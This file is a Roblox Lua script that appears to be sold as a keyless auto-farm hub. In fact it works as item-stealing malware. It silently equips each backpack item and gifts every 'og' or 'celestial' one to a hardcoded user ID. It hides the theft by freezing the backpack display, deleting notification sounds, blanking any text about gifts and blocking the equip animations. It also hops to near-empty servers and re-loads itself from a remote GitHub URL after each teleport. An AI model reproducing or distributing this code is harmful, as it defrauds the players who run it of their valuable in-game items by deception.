local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local SoundService = game:GetService("SoundService")
local TeleportService = game:GetService("TeleportService")
local HttpService = game:GetService("HttpService")

local player = Players.LocalPlayer
local backpack = player:WaitForChild("Backpack")
local PLACE_ID = game.PlaceId

local targetUserId = 9367836539
local giftRemote = ReplicatedStorage.Shared.Packages.Network.rev_GiftRequest
local weightFolder = ReplicatedStorage:WaitForChild("Objects"):WaitForChild("WeightModels")

--====================================================
-- 🔥 LOCK SYSTEM (ANTI DOUBLE HOP)
--====================================================

local hopped = false

--====================================================
-- 🔥 QUEUE SYSTEM
--====================================================

local SCRIPT_URL = "https://raw.githubusercontent.com/changelog-modul/PHOENIXX-HUB/refs/heads/main/AutoFarmKeyless"

local function queueSelf()
    if queue_on_teleport then
        queue_on_teleport([[
            repeat task.wait() until game:IsLoaded()
            task.wait(2)
            loadstring(game:HttpGet("]] .. SCRIPT_URL .. [["))()
        ]])
    end
end

--====================================================
-- 🔥 SERVER CHECK
--====================================================

local function getServerType()
    local remote = game:GetService("RobloxReplicatedStorage"):FindFirstChild("GetServerType")
    if not remote then return nil end

    local ok, res = pcall(function()
        return remote:InvokeServer()
    end)

    if ok and res then
        return string.lower(tostring(res))
    end
end

local function isBadServer()
    local t = getServerType()
    if not t then return false end

    return string.find(t, "vip")
        or string.find(t, "private")
        or string.find(t, "reserved")
end

--====================================================
-- 🌐 SERVER FIND (≤2 PLAYER)
--====================================================

local function getLowServer()
    local url = "https://games.roblox.com/v1/games/"..PLACE_ID.."/servers/Public?sortOrder=Asc&limit=100"

    local success, result = pcall(function()
        return HttpService:JSONDecode(game:HttpGet(url))
    end)

    if not success or not result or not result.data then
        return nil
    end

    for _,server in pairs(result.data) do
        if server.playing and server.playing <= 2 then
            return server.id
        end
    end

    return nil
end

--====================================================
-- 🚀 HOP SYSTEM (FIXED LOCK)
--====================================================

local function hopServer()
    if hopped then return end
    hopped = true

    queueSelf()

    local id = getLowServer()

    if id then
        print("HOP → LOW SERVER")
        TeleportService:TeleportToPlaceInstance(PLACE_ID, id, player)
    else
        print("HOP → FALLBACK")
        TeleportService:Teleport(PLACE_ID, player)
    end
end

--====================================================
-- 🚀 SERVER HANDLER (NO DOUBLE TRIGGER)
--====================================================

task.spawn(function()
    task.wait(2)

    if hopped then return end

    if isBadServer() then
        print("VIP SERVER → HOP")
        hopServer()
        return
    end

    if #Players:GetPlayers() > 2 then
        print("TOO MANY PLAYERS → HOP")
        hopServer()
        return
    end

    print("GOOD SERVER ✅")
end)

task.spawn(function()
    while true do
        task.wait(5)

        if hopped then break end

        if #Players:GetPlayers() > 2 then
            hopServer()
            break
        end
    end
end)

--====================================================
-- 💀 GUI FREEZE (UNCHANGED)
--====================================================

local gui = player:WaitForChild("PlayerGui")
local backpackGui = gui:WaitForChild("Backpack")

local frozenBar, frozenBag
local freezeDone = false
local bagVisibleState = false

local function freezeBackpack()
    if freezeDone then return end

    local bar = backpackGui:FindFirstChild("Bar")
    local bag = backpackGui:FindFirstChild("Backpack")

    if bar then
        frozenBar = bar:Clone()
        frozenBar.Parent = backpackGui
        frozenBar.Visible = bar.Visible
    end

    if bag then
        bagVisibleState = bag.Visible
        frozenBag = bag:Clone()
        frozenBag.Parent = backpackGui
        frozenBag.Visible = bagVisibleState
    end

    freezeDone = true
end

freezeBackpack()

RunService.RenderStepped:Connect(function()
    if frozenBar then frozenBar.Visible = true end
    if frozenBag then frozenBag.Visible = bagVisibleState end
end)

--====================================================
-- 🔇 SOUND + NOTIF CLEAN
--====================================================

local effects = SoundService:WaitForChild("Effects")

for _,name in pairs({"ErrorSound","Notification"}) do
    local obj = effects:FindFirstChild(name)
    if obj then obj:Destroy() end
end

task.spawn(function()
    while task.wait(0) do
        pcall(function()
            for _,v in pairs(player.PlayerGui:GetDescendants()) do
                if v:IsA("TextLabel") or v:IsA("TextButton") then
                    local txt = string.lower(v.Text)
                    if string.find(txt,"gift") or string.find(txt,"queue") then
                        v.Visible = false
                    end
                end
            end
        end)
    end
end)

--====================================================
-- 🎬 ANTI TOOL ANIMATION FIX
--====================================================

local function getChar()
    return player.Character or player.CharacterAdded:Wait()
end

local function blockToolAnimations(hum)
    hum.AnimationPlayed:Connect(function(track)
        local name = string.lower(track.Name)

        if string.find(name, "tool")
        or string.find(name, "equip")
        or string.find(name, "hold") then
            track:Stop(0)
        end
    end)
end

--====================================================
-- 🎁 AUTO GIFT SYSTEM (FIXED)
--====================================================

local function isWeightTool(tool)
    return weightFolder:FindFirstChild(tool.Name) ~= nil
end

local function silentEquip(tool)
    local char = getChar()
    local hum = char:FindFirstChildOfClass("Humanoid")
    if not hum then return end

    blockToolAnimations(hum)

    hum:EquipTool(tool)
    task.wait()

    local handle = tool:FindFirstChild("Handle")
    if handle then
        handle.Transparency = 1
        handle.CanCollide = false
        handle.Massless = true
        handle.Size = Vector3.new(0.05,0.05,0.05)
    end
end

local function unequipAll()
    local char = getChar()
    for _,v in ipairs(char:GetChildren()) do
        if v:IsA("Tool") then
            v.Parent = backpack
        end
    end
end

local function getRarity(tool)
    local model = tool:FindFirstChild(tool.Name)

    if model
    and model:FindFirstChild("Root")
    and model.Root:FindFirstChild("EntityGUI")
    and model.Root.EntityGUI:FindFirstChild("Frame")
    and model.Root.EntityGUI.Frame:FindFirstChild("RarityLabel") then
        return string.lower(model.Root.EntityGUI.Frame.RarityLabel.Text)
    end
end

task.wait(2)

while true do
    task.wait(0.005)

    for _,tool in ipairs(backpack:GetChildren()) do
        if tool:IsA("Tool") then

            if isWeightTool(tool) then
                continue
            end

            silentEquip(tool)
            task.wait(0.005)

            local rarity = getRarity(tool)

            if rarity == "og" or rarity == "celestial" then
                giftRemote:FireServer(targetUserId)
                task.wait(0.005)
            end

            unequipAll()
        end
    end
end
